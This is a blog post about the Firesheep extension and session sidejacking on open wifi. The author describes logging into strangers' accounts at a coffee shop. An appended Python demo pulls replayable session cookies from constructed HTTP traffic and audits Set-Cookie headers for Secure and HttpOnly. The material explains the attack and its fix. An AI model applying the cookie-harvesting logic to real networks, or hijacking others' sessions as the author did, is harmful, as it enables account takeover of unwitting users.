Recently a developer released an extension for Firefox called Firesheep. It was released to demonstrate the poor session security of many popular websites, and how a user's logged-in session can be "sidejacked" on a public wifi access point. The pattern is this: the website encrypts only the login page with HTTPS, then sets a session cookie that the browser sends in the clear with every subsequent plain-HTTP request. Anyone on the same network running Firesheep can capture that cookie from the traffic, load it into their own browser, and do anything the user can do on that site, without ever needing the password. On an open wifi hotspot the cookies are effectively shouted through the air, which makes the attack trivial.

Currently, Firesheep is available for Windows and Mac (a Linux build is coming soon), and requires Firefox version 3.6.12 or newer. The Firefox 4 beta is not supported.

While at my local Starbucks, I fired up Firefox and Firesheep on my Mac to see what it would do while I surfed the web.

[Screenshot: Screen shot 2010-11-08 at 7.00.36 AM.png]

If I double-click on any of the entries, I'm quickly logged into the service as that user. Easy enough.

Hopefully the various websites affected by this will take notice and implement safeguards, namely serving the entire logged-in session over HTTPS and marking the session cookie Secure so the browser never sends it over plain HTTP, to keep their users from falling victim to this type of attack.
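To make the mechanism concrete, here is an added example (my own code, not part of the original post and not Firesheep's source) that does in miniature what the extension does: it walks a set of sniffed TCP payloads, keeps only plaintext HTTP, matches the Host against a Firesheep-style handler table of which cookie names carry a session for that site, and records the Cookie header an attacker would replay. It also includes the server-side check the last paragraph calls for: auditing a Set-Cookie header for the Secure and HttpOnly attributes. The captured packets, site names, cookie names and handler entries are all constructed for illustration.

```python
"""Sidejacking demo: lifting a session cookie from sniffed plaintext HTTP,
plus the Set-Cookie audit that prevents the cookie from ever being sent
that way.  Added example; the traffic and handler table below are
constructed by hand and are not real sites or real Firesheep handlers.
"""
import re
from typing import Dict, List, Optional

# Firesheep-style handler table: for each site, which cookie(s) make up the
# session.  Hypothetical entries; real handlers name real cookies per site.
HANDLERS: Dict[str, List[str]] = {
    "www.example-social.test": ["sessionid"],
    "mail.example-webmail.test": ["auth", "user"],
}

# Constructed "sniffed" traffic as (dst_port, tcp_payload).  On an open wifi
# network an attacker sees all of it; only port-80 payloads are readable.
CAPTURED = [
    (80, b"GET /home HTTP/1.1\r\nHost: www.example-social.test\r\n"
         b"Cookie: lang=en; sessionid=9f8e7d6c5b4a\r\n\r\n"),
    (80, b"GET /inbox HTTP/1.1\r\nHost: mail.example-webmail.test\r\n"
         b"Cookie: auth=Zm9vYmFy; user=alice\r\n\r\n"),
    (80, b"GET /public HTTP/1.1\r\nHost: www.example-social.test\r\n\r\n"),
    (443, b"\x16\x03\x01\x00\x5a\x01\x00\x00\x56\x03\x03..."),  # TLS record, opaque
]


def parse_http_request(payload: bytes) -> Optional[Dict[str, str]]:
    """Return method, path, host and cookie header for a plaintext HTTP
    request, or None if the payload is not readable HTTP."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, _, _ = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = re.match(r"^([A-Z]+) (\S+) HTTP/1\.[01]$", lines[0])
    if not m:
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": m.group(1), "path": m.group(2),
            "host": headers.get("host", ""), "cookie": headers.get("cookie", "")}


def parse_cookie_header(value: str) -> Dict[str, str]:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    pairs: Dict[str, str] = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            pairs[name] = val
    return pairs


def harvest_sessions(captured) -> List[Dict[str, object]]:
    """For each sniffed packet: if it is plaintext HTTP to a site with a
    handler and carries that site's session cookie(s), record a session
    together with the exact Cookie header the attacker's browser replays."""
    found: List[Dict[str, object]] = []
    for port, payload in captured:
        if port != 80:
            continue  # TLS carries the cookie encrypted; nothing to lift
        req = parse_http_request(payload)
        if req is None or req["host"] not in HANDLERS:
            continue
        cookies = parse_cookie_header(req["cookie"])
        wanted = HANDLERS[req["host"]]
        if all(name in cookies for name in wanted):
            found.append({
                "host": req["host"],
                "cookies": {n: cookies[n] for n in wanted},
                "replay_header": "Cookie: " + "; ".join(
                    f"{n}={cookies[n]}" for n in wanted),
            })
    return found


def audit_set_cookie(header_value: str) -> List[str]:
    """Server-side check on a Set-Cookie value.  Without 'Secure' the browser
    will send the cookie over plain HTTP and it can be sidejacked; without
    'HttpOnly' page scripts can read it."""
    attrs = [p.strip().lower() for p in header_value.split(";")[1:]]
    problems = []
    if "secure" not in attrs:
        problems.append("missing Secure: browser will send cookie over plain HTTP")
    if "httponly" not in attrs:
        problems.append("missing HttpOnly: cookie readable by page scripts")
    return problems


if __name__ == "__main__":
    for s in harvest_sessions(CAPTURED):
        print(f"{s['host']}: {s['replay_header']}")
    print(audit_set_cookie("sessionid=9f8e7d6c5b4a; Path=/"))
    print(audit_set_cookie("sessionid=9f8e7d6c5b4a; Path=/; Secure; HttpOnly"))
```

Two of the four constructed payloads yield a replayable session: the third request carries no cookie, and the TLS record is skipped because the cookie inside it is encrypted. That second point is the whole fix: a cookie set with the Secure attribute is never sent on port 80 in the first place, so there is nothing for a sniffer on the hotspot to lift.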